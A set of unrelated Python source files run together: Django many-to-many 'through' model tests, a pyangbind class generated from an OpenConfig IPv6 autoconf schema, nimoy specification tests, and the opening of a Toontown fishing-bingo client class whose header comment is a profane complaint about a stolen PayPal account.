self.jane = Person.objects.create(name='Jane')
self.rock = Group.objects.create(name='Rock')
self.roll = Group.objects.create(name='Roll')
def test_m2m_through(self):
# We start out by making sure that the Group 'rock' has no members.
self.assertQuerysetEqual(
self.rock.members.all(),
[]
)
# To make Jim a member of Group Rock, simply create a Membership object.
m1 = Membership.objects.create(person=self.jim, group=self.rock)
# We can do the same for Jane and Rock.
m2 = Membership.objects.create(person=self.jane, group=self.rock)
# Let's check to make sure that it worked. Jane and Jim should be members of Rock.
self.assertQuerysetEqual(
self.rock.members.all(), [
'Jane',
'Jim'
],
attrgetter("name")
)
# Now we can add a bunch more Membership objects to test with.
m3 = Membership.objects.create(person=self.bob, group=self.roll)
m4 = Membership.objects.create(person=self.jim, group=self.roll)
m5 = Membership.objects.create(person=self.jane, group=self.roll)
# We can get Jim's Group membership as with any ForeignKey.
self.assertQuerysetEqual(
self.jim.group_set.all(), [
'Rock',
'Roll'
],
attrgetter("name")
)
# Querying the intermediary model works like normal.
self.assertEqual(
repr(Membership.objects.get(person=self.jane, group=self.rock)),
'<Membership: Jane is a member of Rock>'
)
# It's not only get that works. Filter works like normal as well.
self.assertQuerysetEqual(
Membership.objects.filter(person=self.jim), [
'<Membership: Jim is a member of Rock>',
'<Membership: Jim is a member of Roll>'
]
)
self.rock.members.clear()
# Now there will be no members of Rock.
self.assertQuerysetEqual(
self.rock.members.all(),
[]
)
def test_forward_descriptors(self):
# Due to complications with adding via an intermediary model,
# the add method is not provided.
self.assertRaises(AttributeError, lambda: self.rock.members.add(self.bob))
# Create is also disabled as it suffers from the same problems as add.
self.assertRaises(AttributeError, lambda: self.rock.members.create(name='Anne'))
# Remove has similar complications, and is not provided either.
self.assertRaises(AttributeError, lambda: self.rock.members.remove(self.jim))
m1 = Membership.objects.create(person=self.jim, group=self.rock)
m2 = Membership.objects.create(person=self.jane, group=self.rock)
# Here we back up the list of all members of Rock.
backup = list(self.rock.members.all())
# ...and we verify that it has worked.
self.assertEqual(
[p.name for p in backup],
['Jane', 'Jim']
)
# The clear function should still work.
self.rock.members.clear()
# Now there will be no members of Rock.
self.assertQuerysetEqual(
self.rock.members.all(),
[]
)
# Assignment should not work with models specifying a through model for many of
# the same reasons as adding.
self.assertRaises(AttributeError, setattr, self.rock, "members", backup)
# Let's re-save those instances that we've cleared.
m1.save()
m2.save()
# Verifying that those instances were re-saved successfully.
self.assertQuerysetEqual(
self.rock.members.all(),[
'Jane',
'Jim'
],
attrgetter("name")
)
def test_reverse_descriptors(self):
# Due to complications with adding via an intermediary model,
# the add method is not provided.
self.assertRaises(AttributeError, lambda: self.bob.group_set.add(self.rock))
# Create is also disabled as it suffers from the same problems as add.
self.assertRaises(AttributeError, lambda: self.bob.group_set.create(name="funk"))
# Remove has similar complications, and is not provided either.
self.assertRaises(AttributeError, lambda: self.jim.group_set.remove(self.rock))
m1 = Membership.objects.create(person=self.jim, group=self.rock)
m2 = Membership.objects.create(person=self.jim, group=self.roll)
# Here we back up the list of all of Jim's groups.
backup = list(self.jim.group_set.all())
self.assertEqual(
[g.name for g in backup],
['Rock', 'Roll']
)
# The clear function should still work.
self.jim.group_set.clear()
# Now Jim will be in no groups.
self.assertQuerysetEqual(
self.jim.group_set.all(),
[]
)
# Assignment should not work with models specifying a through model for many of
# the same reasons as adding.
self.assertRaises(AttributeError, setattr, self.jim, "group_set", backup)
# Let's re-save those instances that we've cleared.
m1.save()
m2.save()
# Verifying that those instances were re-saved successfully.
self.assertQuerysetEqual(
self.jim.group_set.all(),[
'Rock',
'Roll'
],
attrgetter("name")
)
def test_custom_tests(self):
# Let's see if we can query through our second relationship.
self.assertQuerysetEqual(
self.rock.custom_members.all(),
[]
)
# We can query in the opposite direction as well.
self.assertQuerysetEqual(
self.bob.custom.all(),
[]
)
cm1 = CustomMembership.objects.create(person=self.bob, group=self.rock)
cm2 = CustomMembership.objects.create(person=self.jim, group=self.rock)
# If we get the number of people in Rock, it should be both Bob and Jim.
self.assertQuerysetEqual(
self.rock.custom_members.all(),[
'Bob',
'Jim'
],
attrgetter("name")
)
# Bob should only be in one custom group.
self.assertQuerysetEqual(
self.bob.custom.all(),[
'Rock'
],
attrgetter("name")
)
# Let's make sure our new descriptors don't conflict with the FK related_name.
self.assertQuerysetEqual(
self.bob.custom_person_related_name.all(),[
'<CustomMembership: Bob is a member of Rock>'
]
)
def test_self_referential_tests(self):
# Let's first create a person who has no friends.
tony = PersonSelfRefM2M.objects.create(name="Tony")
self.assertQuerysetEqual(
tony.friends.all(),
[]
)
chris = PersonSelfRefM2M.objects.create(name="Chris")
f = Friendship.objects.create(first=tony, second=chris, date_friended=datetime.now())
# Tony should now show that Chris is his friend.
self.assertQuerysetEqual(
tony.friends.all(),[
'Chris'
],
attrgetter("name")
)
# But we haven't established that Chris is Tony's Friend.
self.assertQuerysetEqual(
chris.friends.all(),
[]
)
f2 = Friendship.objects.create(first=chris, second=tony, date_friended=datetime.now())
# Having added Chris as a friend, let's make sure that his friend set reflects
# that addition.
self.assertQuerysetEqual(
chris.friends.all(),[
'Tony'
],
attrgetter("name")
)
# Chris gets mad and wants to get rid of all of his friends.
chris.friends.clear()
# Now he should not have any more friends.
self.assertQuerysetEqual(
chris.friends.all(),
[]
)
# Since this isn't a symmetrical relation, Tony's friend link still exists.
self.assertQuerysetEqual(
tony.friends.all(),[
'Chris'
],
attrgetter("name")
)
def test_query_tests(self):
m1 = Membership.objects.create(person=self.jim, group=self.rock)
m2 = Membership.objects.create(person=self.jane, group=self.rock)
m3 = Membership.objects.create(person=self.bob, group=self.roll)
m4 = Membership.objects.create(person=self.jim, group=self.roll)
m5 = Membership.objects.create(person=self.jane, group=self.roll)
m2.invite_reason = "She was just awesome."
m2.date_joined = datetime(2006, 1, 1)
m2.save()
m3.date_joined = datetime(2004, 1, 1)
m3.save()
m5.date_joined = datetime(2004, 1, 1)
m5.save()
# We can query for the related model by using its attribute name (members, in
# this case).
self.assertQuerysetEqual(
Group.objects.filter(members__name='Bob'),[
'Roll'
],
attrgetter("name")
)
# To query through the intermediary model, we specify its model name.
# In this case, membership.
self.assertQuerysetEqual(
Group.objects.filter(membership__invite_reason="She was just awesome."),[
'Rock'
],
attrgetter("name")
)
# If we want to query in the reverse direction by the related model, use its
# model name (group, in this case).
self.assertQuerysetEqual(
Person.objects.filter(group__name="Rock"),[
'Jane',
'Jim'
],
attrgetter("name")
)
cm1 = CustomMembership.objects.create(person=self.bob, group=self.rock)
cm2 = CustomMembership.objects.create(person=self.jim, group=self.rock)
# If the m2m field has specified a related_name, using that will work.
self.assertQuerysetEqual(
Person.objects.filter(custom__name="Rock"),[
'Bob',
'Jim'
],
attrgetter("name")
)
# To query through the intermediary model in the reverse direction, we again
# specify its model name (membership, in this case).
self.assertQuerysetEqual(
Person.objects.filter(membership__invite_reason="She was just awesome."),[
'Jane'
],
attrgetter("name")
)
# Let's see all of the groups that Jane joined after 1 Jan 2005:
self.assertQuerysetEqual(
Group.objects.filter(membership__date_joined__gt=datetime(2005, 1, 1), membership__person=self.jane),[
'Rock'
],
attrgetter("name")
)
# Queries also work in the reverse direction: Now let's see all of the people
# that have joined Rock since 1 Jan 2005:
self.assertQuerysetEqual(
Person.objects.filter(membership__date_joined__gt=datetime(2005, 1, 1), membership__group=self.rock),[
'Jane',
'Jim'
],
attrgetter("name")
)
# Conceivably, queries through membership could return correct, but non-unique
# querysets. To demonstrate this, we query for all people who have joined a
# group after 2004:
self.assertQuerysetEqual(
Person.objects.filter(membership__date_joined__gt=datetime(2004, 1, 1)),[
'Jane',
'Jim',
'Jim'
],
attrgetter("name")
)
# Jim showed up twice, because he joined two groups ('Rock', and 'Roll'):
self.assertEqual(
[(m.person.name, m.group.name) for m in Membership.objects.filter(date_joined__gt=datetime(2004, 1, 1))],
[('Jane', 'Rock'), ('Jim', 'Rock'), ('Jim', 'Roll')]
)
# QuerySet's distinct() method can correct this problem.
self.assertQuerysetEqual(
Person.objects.filter(membership__date_joined__gt=datetime(2004, 1, 1)).distinct(),[
'Jane',
'Jim'
],
attrgetter("name")
)
| |
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
class state(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-interfaces - based on the path /interfaces/interface/subinterfaces/subinterface/ipv6/autoconf/state. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Operational state data
"""
__slots__ = (
"_path_helper",
"_extmethods",
"__create_global_addresses",
"__create_temporary_addresses",
"__temporary_valid_lifetime",
"__temporary_preferred_lifetime",
)
_yang_name = "state"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__create_global_addresses = YANGDynClass(
base=YANGBool,
default=YANGBool("true"),
is_leaf=True,
yang_name="create-global-addresses",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/interfaces/ip-ext",
defining_module="openconfig-if-ip-ext",
yang_type="boolean",
is_config=False,
)
self.__create_temporary_addresses = YANGDynClass(
base=YANGBool,
default=YANGBool("false"),
is_leaf=True,
yang_name="create-temporary-addresses",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/interfaces/ip-ext",
defining_module="openconfig-if-ip-ext",
yang_type="boolean",
is_config=False,
)
self.__temporary_valid_lifetime = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
default=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
)(
604800
),
is_leaf=True,
yang_name="temporary-valid-lifetime",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/interfaces/ip-ext",
defining_module="openconfig-if-ip-ext",
yang_type="uint32",
is_config=False,
)
self.__temporary_preferred_lifetime = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
default=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
)(
86400
),
is_leaf=True,
yang_name="temporary-preferred-lifetime",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/interfaces/ip-ext",
defining_module="openconfig-if-ip-ext",
yang_type="uint32",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"interfaces",
"interface",
"subinterfaces",
"subinterface",
"ipv6",
"autoconf",
"state",
]
def _get_create_global_addresses(self):
"""
Getter method for create_global_addresses, mapped from YANG variable /interfaces/interface/subinterfaces/subinterface/ipv6/autoconf/state/create_global_addresses (boolean)
YANG Description: [adapted from IETF IP model RFC 7277]
If enabled, the host creates global addresses as
described in RFC 4862.
"""
return self.__create_global_addresses
def _set_create_global_addresses(self, v, load=False):
"""
Setter method for create_global_addresses, mapped from YANG variable /interfaces/interface/subinterfaces/subinterface/ipv6/autoconf/state/create_global_addresses (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_create_global_addresses is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_create_global_addresses() directly.
YANG Description: [adapted from IETF IP model RFC 7277]
If enabled, the host creates global addresses as
described in RFC 4862.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=YANGBool,
default=YANGBool("true"),
is_leaf=True,
yang_name="create-global-addresses",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/interfaces/ip-ext",
defining_module="openconfig-if-ip-ext",
yang_type="boolean",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """create_global_addresses must be of a type compatible with boolean""",
"defined-type": "boolean",
"generated-type": """YANGDynClass(base=YANGBool, default=YANGBool("true"), is_leaf=True, yang_name="create-global-addresses", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/interfaces/ip-ext', defining_module='openconfig-if-ip-ext', yang_type='boolean', is_config=False)""",
}
)
self.__create_global_addresses = t
if hasattr(self, "_set"):
self._set()
def _unset_create_global_addresses(self):
self.__create_global_addresses = YANGDynClass(
base=YANGBool,
default=YANGBool("true"),
is_leaf=True,
yang_name="create-global-addresses",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/interfaces/ip-ext",
defining_module="openconfig-if-ip-ext",
yang_type="boolean",
is_config=False,
)
def _get_create_temporary_addresses(self):
"""
Getter method for create_temporary_addresses, mapped from YANG variable /interfaces/interface/subinterfaces/subinterface/ipv6/autoconf/state/create_temporary_addresses (boolean)
YANG Description: [adapted from IETF IP model RFC 7277]
If enabled, the host creates temporary addresses as
described in RFC 4941.
"""
return self.__create_temporary_addresses
def _set_create_temporary_addresses(self, v, load=False):
"""
Setter method for create_temporary_addresses, mapped from YANG variable /interfaces/interface/subinterfaces/subinterface/ipv6/autoconf/state/create_temporary_addresses (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_create_temporary_addresses is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_create_temporary_addresses() directly.
YANG Description: [adapted from IETF IP model RFC 7277]
If enabled, the host creates temporary addresses as
described in RFC 4941.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=YANGBool,
default=YANGBool("false"),
is_leaf=True,
yang_name="create-temporary-addresses",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/interfaces/ip-ext",
defining_module="openconfig-if-ip-ext",
yang_type="boolean",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """create_temporary_addresses must be of a type compatible with boolean""",
"defined-type": "boolean",
"generated-type": """YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="create-temporary-addresses", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/interfaces/ip-ext', defining_module='openconfig-if-ip-ext', yang_type='boolean', is_config=False)""",
}
)
self.__create_temporary_addresses = t
if hasattr(self, "_set"):
self._set()
def _unset_create_temporary_addresses(self):
self.__create_temporary_addresses = YANGDynClass(
base=YANGBool,
default=YANGBool("false"),
is_leaf=True,
yang_name="create-temporary-addresses",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/interfaces/ip-ext",
defining_module="openconfig-if-ip-ext",
yang_type="boolean",
is_config=False,
)
def _get_temporary_valid_lifetime(self):
"""
Getter method for temporary_valid_lifetime, mapped from YANG variable /interfaces/interface/subinterfaces/subinterface/ipv6/autoconf/state/temporary_valid_lifetime (uint32)
YANG Description: [adapted from IETF IP model RFC 7277]
The time period during which the temporary address
is valid.
"""
return self.__temporary_valid_lifetime
def _set_temporary_valid_lifetime(self, v, load=False):
"""
Setter method for temporary_valid_lifetime, mapped from YANG variable /interfaces/interface/subinterfaces/subinterface/ipv6/autoconf/state/temporary_valid_lifetime (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_temporary_valid_lifetime is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_temporary_valid_lifetime() directly.
YANG Description: [adapted from IETF IP model RFC 7277]
The time period during which the temporary address
is valid.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
default=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
)(
604800
),
is_leaf=True,
yang_name="temporary-valid-lifetime",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/interfaces/ip-ext",
defining_module="openconfig-if-ip-ext",
yang_type="uint32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """temporary_valid_lifetime must be of a type compatible with uint32""",
"defined-type": "uint32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(604800), is_leaf=True, yang_name="temporary-valid-lifetime", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/interfaces/ip-ext', defining_module='openconfig-if-ip-ext', yang_type='uint32', is_config=False)""",
}
)
self.__temporary_valid_lifetime = t
if hasattr(self, "_set"):
self._set()
def _unset_temporary_valid_lifetime(self):
self.__temporary_valid_lifetime = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
default=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
)(
604800
),
is_leaf=True,
yang_name="temporary-valid-lifetime",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/interfaces/ip-ext",
defining_module="openconfig-if-ip-ext",
yang_type="uint32",
is_config=False,
)
def _get_temporary_preferred_lifetime(self):
"""
Getter method for temporary_preferred_lifetime, mapped from YANG variable /interfaces/interface/subinterfaces/subinterface/ipv6/autoconf/state/temporary_preferred_lifetime (uint32)
YANG Description: [adapted from IETF IP model RFC 7277]
The time period during which the temporary address is
preferred.
"""
return self.__temporary_preferred_lifetime
def _set_temporary_preferred_lifetime(self, v, load=False):
"""
Setter method for temporary_preferred_lifetime, mapped from YANG variable /interfaces/interface/subinterfaces/subinterface/ipv6/autoconf/state/temporary_preferred_lifetime (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_temporary_preferred_lifetime is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_temporary_preferred_lifetime() directly.
YANG Description: [adapted from IETF IP model RFC 7277]
The time period during which the temporary address is
preferred.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
default=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
)(
86400
),
is_leaf=True,
yang_name="temporary-preferred-lifetime",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/interfaces/ip-ext",
defining_module="openconfig-if-ip-ext",
yang_type="uint32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """temporary_preferred_lifetime must be of a type compatible with uint32""",
"defined-type": "uint32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(86400), is_leaf=True, yang_name="temporary-preferred-lifetime", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/interfaces/ip-ext', defining_module='openconfig-if-ip-ext', yang_type='uint32', is_config=False)""",
}
)
self.__temporary_preferred_lifetime = t
if hasattr(self, "_set"):
self._set()
def _unset_temporary_preferred_lifetime(self):
self.__temporary_preferred_lifetime = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
default=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
)(
86400
),
is_leaf=True,
yang_name="temporary-preferred-lifetime",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/interfaces/ip-ext",
defining_module="openconfig-if-ip-ext",
yang_type="uint32",
is_config=False,
)
create_global_addresses = __builtin__.property(_get_create_global_addresses)
create_temporary_addresses = __builtin__.property(_get_create_temporary_addresses)
temporary_valid_lifetime = __builtin__.property(_get_temporary_valid_lifetime)
temporary_preferred_lifetime = __builtin__.property(
_get_temporary_preferred_lifetime
)
_pyangbind_elements = OrderedDict(
[
("create_global_addresses", create_global_addresses),
("create_temporary_addresses", create_temporary_addresses),
("temporary_valid_lifetime", temporary_valid_lifetime),
("temporary_preferred_lifetime", temporary_preferred_lifetime),
]
)
| |
from nimoy.runner.exceptions import InvalidFeatureBlockException
from nimoy.specification import Specification
from specs.nimoy.runner_helper import run_spec_contents
class ExpectBlocksSpec(Specification):
def successful_given(self):
with given:
spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
def test(self):
with given:
a = 3
with expect:
a != 4
"""
with when:
result = run_spec_contents(spec_contents)
with then:
result.wasSuccessful() == True
def successful_setup(self):
with given:
spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
def test(self):
with setup:
a = 3
with expect:
a != 4
"""
with when:
result = run_spec_contents(spec_contents)
with then:
result.wasSuccessful() == True
def dangling_setup(self):
with given:
spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
def test(self):
with setup:
a = 3
"""
with when:
run_spec_contents(spec_contents)
with then:
thrown(InvalidFeatureBlockException)
def dangling_given(self):
with given:
spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
def test(self):
with given:
a = 3
"""
with when:
run_spec_contents(spec_contents)
with then:
thrown(InvalidFeatureBlockException)
def successful_when_then(self):
with given:
spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
def test(self):
with when:
a = 3
with then:
a != 4
"""
with when:
result = run_spec_contents(spec_contents)
with then:
result.wasSuccessful() == True
def failing_when_then(self):
with given:
spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
def test(self):
with when:
a = 3
with then:
a == 4
"""
with when:
result = run_spec_contents(spec_contents)
with then:
result.wasSuccessful() == False
def dangling_when(self):
with given:
spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
def test(self):
with setup:
a = 3
with when:
b = 4
"""
with when:
run_spec_contents(spec_contents)
with then:
thrown(InvalidFeatureBlockException)
def dangling_then(self):
with given:
spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
def test(self):
with setup:
a = 3
with then:
a == 4
"""
with when:
run_spec_contents(spec_contents)
with then:
thrown(InvalidFeatureBlockException)
def successful_expectation(self):
with given:
spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
def test(self):
with expect:
a = 3
a != 4
"""
with when:
result = run_spec_contents(spec_contents)
with then:
result.wasSuccessful() == True
def failing_expectation(self):
with given:
spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
def test(self):
with expect:
a = 3
a == 4
"""
with when:
result = run_spec_contents(spec_contents)
with then:
result.wasSuccessful() == False
def multiple_expectation(self):
with given:
spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
def test(self):
with expect:
a = 3
a != 4
with expect:
a = [1, 2, 3]
2 in a
"""
with when:
result = run_spec_contents(spec_contents)
with then:
result.wasSuccessful() == True
def expect_after_where(self):
with given:
spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
def test(self):
with where:
pass
with expect:
2 != 1
"""
with when:
run_spec_contents(spec_contents)
with then:
thrown(InvalidFeatureBlockException)
def double_where(self):
with given:
spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
def test(self):
with where:
pass
with where:
pass
"""
with when:
run_spec_contents(spec_contents)
with then:
thrown(InvalidFeatureBlockException)
def expected_exception(self):
with given:
spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
def test(self):
with when:
raise Exception('Whaaaaat')
with then:
thrown(Exception)
"""
with when:
result = run_spec_contents(spec_contents)
with then:
result.wasSuccessful() == True
def expected_derived_exception(self):
with given:
spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
def test(self):
with when:
raise AssertionError('Whaaaaat')
with then:
thrown(Exception)
"""
with when:
result = run_spec_contents(spec_contents)
with then:
result.wasSuccessful() == True
def unexpected_exception(self):
with given:
spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
def test(self):
with when:
raise Exception('Whaaaaat')
with then:
pass
"""
with when:
result = run_spec_contents(spec_contents)
with then:
"Exception: Whaaaaat" in result.errors[0][1]
result.wasSuccessful() == False
def successful_exception_message_assertion(self):
with given:
spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
def test(self):
with when:
raise Exception('Whaaaaat')
with then:
err = thrown(Exception)
str(err[1]) == 'Whaaaaat'
"""
with when:
result = run_spec_contents(spec_contents)
with then:
result.wasSuccessful() == True
def failed_exception_type_assertion(self):
with given:
spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
def test(self):
with when:
raise Exception('Whaaaaat')
with then:
err = thrown(ArithmeticError)
"""
with when:
result = run_spec_contents(spec_contents)
"'ArithmeticError' but found 'Exception'" in result.failures[0][1]
with then:
result.wasSuccessful() == False
def failed_exception_message_assertion(self):
with given:
spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
def test(self):
with when:
raise Exception('Whaaaaat')
with then:
err = thrown(Exception)
str(err[1]) == 'Moo'
"""
with when:
result = run_spec_contents(spec_contents)
with then:
"Expected: 'Moo'" in result.failures[0][1]
result.wasSuccessful() == False
def unfulfilled_exception_expectation(self):
with given:
spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
def test(self):
with when:
pass
with then:
err = thrown(Exception)
err.message == 'Whaaaaat'
"""
with when:
result = run_spec_contents(spec_contents)
with then:
"'Exception' to be thrown" in result.failures[0][1]
result.wasSuccessful() == False
| |
# Fuck you Disyer. Stealing my fucking paypal. GET FUCKED: toontown.fishing.DistributedPondBingoManager
from panda3d.core import VBase4
from direct.distributed import DistributedObject
from direct.distributed.ClockDelta import *
from direct.directnotify import DirectNotifyGlobal
from direct.fsm import FSM
from direct.gui.DirectGui import *
from direct.task import Task
from toontown.fishing import BingoGlobals
from toontown.fishing import BingoCardGui
from toontown.fishing import FishGlobals
from toontown.fishing import NormalBingo
from toontown.fishing import FourCornerBingo
from toontown.fishing import DiagonalBingo
from toontown.fishing import ThreewayBingo
from toontown.fishing import BlockoutBingo
from direct.showbase import RandomNumGen
from toontown.toonbase import ToontownTimer
from toontown.toonbase import ToontownGlobals
from toontown.toonbase import TTLocalizer
import time
class DistributedPondBingoManager(DistributedObject.DistributedObject, FSM.FSM):
notify = DirectNotifyGlobal.directNotify.newCategory('DistributedPondBingoManager')
cardTypeDict = {BingoGlobals.NORMAL_CARD: NormalBingo.NormalBingo,
BingoGlobals.FOURCORNER_CARD: FourCornerBingo.FourCornerBingo,
BingoGlobals.DIAGONAL_CARD: DiagonalBingo.DiagonalBingo,
BingoGlobals.THREEWAY_CARD: ThreewayBingo.ThreewayBingo,
BingoGlobals.BLOCKOUT_CARD: BlockoutBingo.BlockoutBingo}
def __init__(self, cr):
DistributedObject.DistributedObject.__init__(self, cr)
FSM.FSM.__init__(self, 'DistributedPondBingoManager')
self.cardId = 0
self.jackpot = 0
self.pond = None
self.spot = None
self.card = None
self.hasEntered = 0
self.initGameState = None
self.lastCatch = None
self.typeId = BingoGlobals.NORMAL_CARD
return
def generate(self):
DistributedObject.DistributedObject.generate(self)
self.card = BingoCardGui.BingoCardGui()
self.card.reparentTo(aspect2d, 1)
self.card.hideNextGameTimer()
self.notify.debug('generate: DistributedPondBingoManager')
def delete(self):
self.pond.resetSpotGui()
del self.pond.pondBingoMgr
self.pond.pondBingoMgr = None
del self.pond
self.pond = None
FSM.FSM.cleanup(self)
self.card.destroy()
del self.card
self.notify.debug('delete: Deleting Local PondManager %s' % self.doId)
DistributedObject.DistributedObject.delete(self)
return
def d_cardUpdate(self, cellId, genus, species):
self.sendUpdate('cardUpdate', [self.cardId,
cellId,
genus,
species])
def d_bingoCall(self):
self.sendUpdate('handleBingoCall', [self.cardId])
def setCardState(self, cardId, typeId, tileSeed, gameState):
self.cardId = cardId
self.typeId = typeId
self.tileSeed = tileSeed
self.jackpot = BingoGlobals.getJackpot(typeId)
self.initGameState = gameState
def checkForUpdate(self, cellId):
if self.lastCatch is not None:
genus = self.lastCatch[0]
species = self.lastCatch[1]
self.d_cardUpdate(cellId, genus, species)
success = self.card.cellUpdateCheck(cellId, genus, species)
if success == BingoGlobals.WIN:
self.lastCatch = None
self.enableBingo()
self.pond.getLocalToonSpot().cleanupFishPanel()
self.pond.getLocalToonSpot().hideBootPanel()
elif success == BingoGlobals.UPDATE:
self.lastCatch = None
self.pond.getLocalToonSpot().cleanupFishPanel()
self.pond.getLocalToonSpot().hideBootPanel()
else:
self.notify.warning('CheckForWin: Attempt to Play Cell without a valid catch.')
return
def updateGameState(self, gameState, cellId):
game = self.card.getGame()
